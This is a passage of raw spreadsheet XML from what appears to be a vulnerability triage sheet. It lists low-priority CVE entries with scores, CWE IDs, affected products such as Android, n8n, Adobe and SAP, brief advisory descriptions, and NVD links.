s="5" t="inlineStr" /><c r="L1519" s="5" t="inlineStr" /><c r="M1519" s="5" t="inlineStr" /><c r="N1519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1519" s="5" t="inlineStr" /><c r="R1519" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="S1519" s="5" t="inlineStr"><is><t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t></is></c><c r="T1519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t></is></c></row><row r="1520"><c r="A1520" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1520" s="5" t="inlineStr"><is><t>CVE-2026-86994</t></is></c><c r="D1520" s="5" t="n"><v>4.3</v></c><c r="E1520" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1520" s="5" t="inlineStr" /><c r="H1520" s="5" t="n"><v>0.002</v></c><c r="I1520" s="5" t="inlineStr" /><c r="J1520" s="5" t="inlineStr" /><c r="K1520" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1520" s="5" t="inlineStr" /><c r="M1520" s="5" t="inlineStr" /><c r="N1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1520" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1520" s="5" t="inlineStr" /><c r="R1520" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1520" s="5" t="inlineStr"><is><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is></c><c r="T1520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t></is></c></row><row r="1521"><c r="A1521" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1521" s="5" t="inlineStr"><is><t>CVE-2026-86995</t></is></c><c r="D1521" s="5" t="n"><v>4.3</v></c><c r="E1521" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1521" s="5" t="inlineStr" /><c r="H1521" s="5" t="n"><v>0.003</v></c><c r="I1521" s="5" t="inlineStr" /><c r="J1521" s="5" t="inlineStr" /><c r="K1521" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1521" s="5" t="inlineStr" /><c r="M1521" s="5" t="inlineStr" /><c r="N1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1521" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1521" s="5" t="inlineStr" /><c r="R1521" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S1521" s="5" t="inlineStr"><is><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is></c><c r="T1521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t></is></c></row><row r="1522"><c r="A1522" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1522" s="5" t="inlineStr"><is><t>CVE-2026-12285</t></is></c><c r="D1522" s="5" t="n"><v>4</v></c><c r="E1522" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1522" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1522" s="5" t="inlineStr" /><c r="H1522" s="5" t="n"><v>0.001</v></c><c r="I1522" s="5" t="inlineStr" /><c r="J1522" s="5" t="inlineStr" /><c r="K1522" s="5" t="inlineStr" /><c r="L1522" s="5" t="inlineStr" /><c r="M1522" s="5" t="inlineStr" /><c r="N1522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1522" s="5" t="inlineStr" /><c r="R1522" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1522"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522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t></is></c></row><row r="1523"><c r="A1523" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1523" s="5" t="inlineStr"><is><t>CVE-2026-80159</t></is></c><c r="D1523" s="5" t="n"><v>4</v></c><c r="E1523" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1523" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1523" s="5" t="inlineStr" /><c r="H1523" s="5" t="n"><v>0.001</v></c><c r="I1523" s="5" t="inlineStr" /><c r="J1523" s="5" t="inlineStr" /><c r="K1523" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1523" s="5" t="inlineStr" /><c r="M1523" s="5" t="inlineStr" /><c r="N1523" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1523" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1523" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1523" s="5" t="inlineStr" /><c r="R1523" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S1523" s="5" t="inlineStr"><is><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is></c><c r="T1523" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80159</t></is></c></row><row r="1524"><c r="A1524" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1524" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1524" s="5" t="inlineStr"><is><t>CVE-2026-49895</t></is></c><c r="D1524" s="5" t="n"><v>3.5</v></c><c r="E1524" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1524" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1524" s="5" t="inlineStr" /><c r="H1524" s="5" t="n"><v>0.001</v></c><c r="I1524" s="5" t="inlineStr" /><c r="J1524" s="5" t="inlineStr" /><c r="K1524" s="5" t="inlineStr" /><c r="L1524" s="5" t="inlineStr" /><c r="M1524" s="5" t="inlineStr" /><c r="N1524" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1524" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1524" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1524" s="5" t="inlineStr" /><c r="R1524" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1524" s="5" t="inlineStr"><is><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is></c><c r="T1524" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49895</t></is></c></row><row r="1525"><c r="A1525" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1525" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1525" s="5" t="inlineStr"><is><t>CVE-2026-69904</t></is></c><c r="D1525" s="5" t="n"><v>3.5</v></c><c r="E1525" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1525" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1525" s="5" t="inlineStr" /><c r="H1525" s="5" t="n"><v>0.006</v></c><c r="I1525" s="5" t="inlineStr" /><c r="J1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1525" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1525" s="5" t="inlineStr" /><c r="M1525" s="5" t="inlineStr" /><c r="N1525" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1525" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1525" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1525" s="5" t="inlineStr" /><c r="R1525" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1525" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1525" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t></is></c></row><row r="1526"><c r="A1526" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1526" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1526" s="5" t="inlineStr"><is><t>CVE-2026-75726</t></is></c><c r="D1526" s="5" t="n"><v>3.5</v></c><c r="E1526" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1526" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1526" s="5" t="inlineStr" /><c r="H1526" s="5" t="n"><v>0.004</v></c><c r="I1526" s="5" t="inlineStr" /><c r="J1526" s="5" t="inlineStr" /><c r="K1526" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1526" s="5" t="inlineStr" /><c r="M1526" s="5" t="inlineStr" /><c r="N1526" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1526" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1526" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1526" s="5" t="inlineStr" /><c r="R1526" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1526" s="5" t="inlineStr"><is><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is></c><c r="T1526" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75726</t></is></c></row><row r="1527"><c r="A1527" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1527" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1527" s="5" t="inlineStr"><is><t>CVE-2026-76960</t></is></c><c r="D1527" s="5" t="n"><v>3.5</v></c><c r="E1527" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1527" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1527" s="5" t="inlineStr" /><c r="H1527" s="5" t="n"><v>0.001</v></c><c r="I1527" s="5" t="inlineStr" /><c r="J1527" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1527" s="5" t="inlineStr" /><c r="L1527" s="5" t="inlineStr" /><c r="M1527" s="5" t="inlineStr" /><c r="N1527" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1527" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1527" s="5" t="inlineStr" /><c r="R1527" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1527"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27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t></is></c></row><row r="1528"><c r="A1528" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1528" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1528" s="5" t="inlineStr"><is><t>CVE-2026-76961</t></is></c><c r="D1528" s="5" t="n"><v>3.5</v></c><c r="E1528" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1528" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1528" s="5" t="inlineStr" /><c r="H1528" s="5" t="n"><v>0.001</v></c><c r="I1528" s="5" t="inlineStr" /><c r="J1528" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1528" s="5" t="inlineStr" /><c r="L1528" s="5" t="inlineStr" /><c r="M1528" s="5" t="inlineStr" /><c r="N1528" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1528" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1528" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1528" s="5" t="inlineStr" /><c r="R1528" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1528"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28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t></is></c></row><row r="1529"><c r="A1529" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1529" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1529" s="5" t="inlineStr"><is><t>CVE-2026-0054</t></is></c><c r="D1529" s="5" t="n"><v>3.3</v></c><c r="E1529" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1529" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1529" s="5" t="inlineStr" /><c r="H1529" s="5" t="n"><v>0.001</v></c><c r="I1529" s="5" t="inlineStr" /><c r="J1529" s="5" t="inlineStr" /><c r="K1529" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1529" s="5" t="inlineStr" /><c r="M1529" s="5" t="inlineStr" /><c r="N1529" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1529" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1529" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1529" s="5" t="inlineStr" /><c r="R1529" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1529" s="5" t="inlineStr"><is><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is></c><c r="T1529" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0054</t></is></c></row><row r="1530"><c r="A1530" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1530" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1530" s="5" t="inlineStr"><is><t>CVE-2026-28582</t></is></c><c r="D1530" s="5" t="n"><v>3.3</v></c><c r="E1530" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1530" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1530" s="5" t="inlineStr" /><c r="H1530" s="5" t="n"><v>0.001</v></c><c r="I1530" s="5" t="inlineStr" /><c r="J1530" s="5" t="inlineStr" /><c r="K1530" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1530" s="5" t="inlineStr" /><c r="M1530" s="5" t="inlineStr" /><c r="N1530" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1530" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1530" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1530" s="5" t="inlineStr" /><c r="R1530" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1530" s="5" t="inlineStr"><is><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is></c><c r="T1530" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28582</t></is></c></row><row r="1531"><c r="A1531" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1531" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1531" s="5" t="inlineStr"><is><t>CVE-2026-28622</t></is></c><c r="D1531" s="5" t="n"><v>3.3</v></c><c r="E1531" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1531" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1531" s="5" t="inlineStr" /><c r="H1531" s="5" t="n"><v>0.001</v></c><c r="I1531" s="5" t="inlineStr" /><c r="J1531" s="5" t="inlineStr" /><c r="K1531" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1531" s="5" t="inlineStr" /><c r="M1531" s="5" t="inlineStr" /><c r="N1531" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1531" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1531" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1531" s="5" t="inlineStr" /><c r="R1531" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1531" s="5" t="inlineStr"><is><t>In getQueryBuilderInternal of MediaProvider.java, there is a possible way to retrieve location metadata due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1531" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28622</t></is></c></row><row r="1532"><c r="A1532" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1532" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1532" s="5" t="inlineStr"><is><t>CVE-2026-28623</t></is></c><c r="D1532" s="5" t="n"><v>3.3</v></c><c r="E1532" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1532" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1532" s="5" t="inlineStr" /><c r="H1532" s="5" t="n"><v>0.001</v></c><c r="I1532" s="5" t="inlineStr" /><c r="J1532" s="5" t="inlineStr" /><c r="K1532" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1532" s="5" t="inlineStr" /><c r="M1532" s="5" t="inlineStr" /><c r="N1532" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1532" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1532" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1532" s="5" t="inlineStr" /><c r="R1532" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1532" s="5" t="inlineStr"><is><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is></c><c r="T1532" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28623</t></is></c></row><row r="1533"><c r="A1533" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1533" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1533" s="5" t="inlineStr"><is><t>CVE-2026-28630</t></is></c><c r="D1533" s="5" t="n"><v>3.3</v></c><c r="E1533" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1533" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1533" s="5" t="inlineStr" /><c r="H1533" s="5" t="n"><v>0.001</v></c><c r="I1533" s="5" t="inlineStr" /><c r="J1533" s="5" t="inlineStr" /><c r="K1533" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1533" s="5" t="inlineStr" /><c r="M1533" s="5" t="inlineStr" /><c r="N1533" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1533" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1533" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1533" s="5" t="inlineStr" /><c r="R1533" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S1533" s="5" t="inlineStr"><is><t>In onCreate of ContactsPickerActivity.kt, there is a possible misleading UI due to a tapjacking/overlay attack. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1533" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28630</t></is></c></row><row r="1534"><c r="A1534" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1534" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1534" s="5" t="inlineStr"><is><t>CVE-2026-28638</t></is></c><c r="D1534" s="5" t="n"><v>3.3</v></c><c r="E1534" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1534" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1534" s="5" t="inlineStr" /><c r="H1534" s="5" t="n"><v>0.001</v></c><c r="I1534" s="5" t="inlineStr" /><c r="J1534" s="5" t="inlineStr" /><c r="K1534" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1534" s="5" t="inlineStr" /><c r="M1534" s="5" t="inlineStr" /><c r="N1534" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1534" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1534" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1534" s="5" t="inlineStr" /><c r="R1534" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1534" s="5" t="inlineStr"><is><t>In multiple functions of XmpDataParser.java, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1534" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28638</t></is></c></row><row r="1535"><c r="A1535" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1535" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1535" s="5" t="inlineStr"><is><t>CVE-2026-28660</t></is></c><c r="D1535" s="5" t="n"><v>3.3</v></c><c r="E1535" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1535" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1535" s="5" t="inlineStr" /><c r="H1535" s="5" t="n"><v>0.001</v></c><c r="I1535" s="5" t="inlineStr" /><c r="J1535" s="5" t="inlineStr" /><c r="K1535" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1535" s="5" t="inlineStr" /><c r="M1535" s="5" t="inlineStr" /><c r="N1535" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1535" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1535" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1535" s="5" t="inlineStr" /><c r="R1535" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1535" s="5" t="inlineStr"><is><t>In getAllSessions of multiple files, there is a possible confused deputy due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1535" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28660</t></is></c></row><row r="1536"><c r="A1536" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1536" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1536" s="5" t="inlineStr"><is><t>CVE-2026-28671</t></is></c><c r="D1536" s="5" t="n"><v>3.3</v></c><c r="E1536" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1536" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1536" s="5" t="inlineStr" /><c r="H1536" s="5" t="n"><v>0.001</v></c><c r="I1536" s="5" t="inlineStr" /><c r="J1536" s="5" t="inlineStr" /><c r="K1536" s="5" t="inlineStr" /><c r="L1536" s="5" t="inlineStr" /><c r="M1536" s="5" t="inlineStr" /><c r="N1536" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1536" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1536" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1536" s="5" t="inlineStr" /><c r="R1536" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S1536" s="5" t="inlineStr"><is><t>In updateInternal of MediaProvider.java, there is a possible expose contents of files due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1536" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28671</t></is></c></row><row r="1537"><c r="A1537" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1537" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1537" s="5" t="inlineStr"><is><t>CVE-2026-45519</t></is></c><c r="D1537" s="5" t="n"><v>3.3</v></c><c r="E1537" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1537" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1537" s="5" t="inlineStr" /><c r="H1537" s="5" t="n"><v>0.001</v></c><c r="I1537" s="5" t="inlineStr" /><c r="J1537" s="5" t="inlineStr" /><c r="K1537" s="5" t="inlineStr" /><c r="L1537" s="5" t="inlineStr" /><c r="M1537" s="5" t="inlineStr" /><c r="N1537" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1537" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1537" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1537" s="5" t="inlineStr" /><c r="R1537" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1537" s="5" t="inlineStr"><is><t>In screenArgsForPermissionCheckIfAny of multiple locations there is a possible risk of unauthorized access due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1537" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45519</t></is></c></row><row r="1538"><c r="A1538" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1538" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1538" s="5" t="inlineStr"><is><t>CVE-2026-45521</t></is></c><c r="D1538" s="5" t="n"><v>3.3</v></c><c r="E1538" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1538" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1538" s="5" t="inlineStr" /><c r="H1538" s="5" t="n"><v>0.001</v></c><c r="I1538" s="5" t="inlineStr" /><c r="J1538" s="5" t="inlineStr" /><c r="K1538" s="5" t="inlineStr" /><c r="L1538" s="5" t="inlineStr" /><c r="M1538" s="5" t="inlineStr" /><c r="N1538" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1538" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1538" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1538" s="5" t="inlineStr" /><c r="R1538" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1538" s="5" t="inlineStr"><is><t>In openFile of AppFuseBridge.java, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1538" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45521</t></is></c></row><row r="1539"><c r="A1539" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1539" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1539" s="5" t="inlineStr"><is><t>CVE-2026-45525</t></is></c><c r="D1539" s="5" t="n"><v>3.3</v></c><c r="E1539" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1539" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1539" s="5" t="inlineStr" /><c r="H1539" s="5" t="n"><v>0.001</v></c><c r="I1539" s="5" t="inlineStr" /><c r="J1539" s="5" t="inlineStr" /><c r="K1539" s="5" t="inlineStr" /><c r="L1539" s="5" t="inlineStr" /><c r="M1539" s="5" t="inlineStr" /><c r="N1539" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1539" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1539" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1539" s="5" t="inlineStr" /><c r="R1539" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S1539" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible improper data sanitization due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1539" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45525</t></is></c></row><row r="1540"><c r="A1540" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1540" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1540" s="5" t="inlineStr"><is><t>CVE-2026-55290</t></is></c><c r="D1540" s="5" t="n"><v>3.3</v></c><c r="E1540" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1540" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1540" s="5" t="inlineStr" /><c r="H1540" s="5" t="n"><v>0.001</v></c><c r="I1540" s="5" t="inlineStr" /><c r="J1540" s="5" t="inlineStr" /><c r="K1540" s="5" t="inlineStr" /><c r="L1540" s="5" t="inlineStr" /><c r="M1540" s="5" t="inlineStr" /><c r="N1540" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1540" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1540" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1540" s="5" t="inlineStr" /><c r="R1540" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S1540" s="5" t="inlineStr"><is><t>In setTo of ResourceTypes.cpp, there is a possible out-of-bounds heap read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1540" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55290</t></is></c></row><row r="1541"><c r="A1541" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1541" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1541" s="5" t="inlineStr"><is><t>CVE-2026-86564</t></is></c><c r="D1541" s="5" t="n"><v>3.3</v></c><c r="E1541" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1541" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1541" s="5" 